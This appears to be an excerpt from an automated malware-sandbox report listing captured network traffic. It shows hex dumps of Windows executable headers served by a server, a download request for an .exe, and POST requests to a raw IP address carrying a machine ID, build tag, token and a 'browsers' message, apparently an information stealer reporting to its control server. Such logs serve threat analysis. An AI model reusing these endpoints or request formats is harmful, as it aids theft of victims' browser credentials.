00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 16:58:09 GMTContent-Type: application/x-msdos-programContent-Length: 685392Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 16:58:10 GMTContent-Type: application/x-msdos-programContent-Length: 608080Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 16:58:11 GMTContent-Type: application/x-msdos-programContent-Length: 450024Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 16:58:13 GMTContent-Type: application/x-msdos-programContent-Length: 2046288Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 16:58:17 GMTContent-Type: application/x-msdos-programContent-Length: 257872Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 16:58:20 GMTContent-Type: application/x-msdos-programContent-Length: 80880Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET /TukN/PL1226two.exe HTTP/1.1Host: oshi.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAEBAFBGIDHCBFHIECFCHost: 5.42.66.58Content-Length: 215Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 34 34 32 45 43 31 46 36 44 30 34 33 34 37 39 32 32 31 31 33 32 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 34 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 2d 2d 0d 0a Data Ascii: ------AAEBAFBGIDHCBFHIECFCContent-Disposition: form-data; name="hwid"0442EC1F6D043479221132------AAEBAFBGIDHCBFHIECFCContent-Disposition: form-data; name="build"default4------AAEBAFBGIDHCBFHIECFC--
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFIEGCAECGCAEBFHDHIEHost: 5.42.66.58Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 49 45 47 43 41 45 43 47 43 41 45 42 46 48 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 34 37 63 30 32 36 37 63 30 37 34 31 38 65 63 63 39 38 30 35 36 62 65 32 63 66 32 30 36 38 36 35 61 66 61 30 39 65 66 37 33 37 61 62 64 62 66 30 35 63 33 36 38 64 62 37 66 63 61 34 63 66 61 34 37 37 64 64 66 63 63 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 45 47 43 41 45 43 47 43 41 45 42 46 48 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 45 47 43 41 45 43 47 43 41 45 42 46 48 44 48 49 45 2d 2d 0d 0a Data Ascii: ------AFIEGCAECGCAEBFHDHIEContent-Disposition: form-data; name="token"147c0267c07418ecc98056be2cf206865afa09ef737abdbf05c368db7fca4cfa477ddfcc------AFIEGCAECGCAEBFHDHIEContent-Disposition: form-data; name="message"browsers------AFIEGCAECGCAEBFHDHIE--
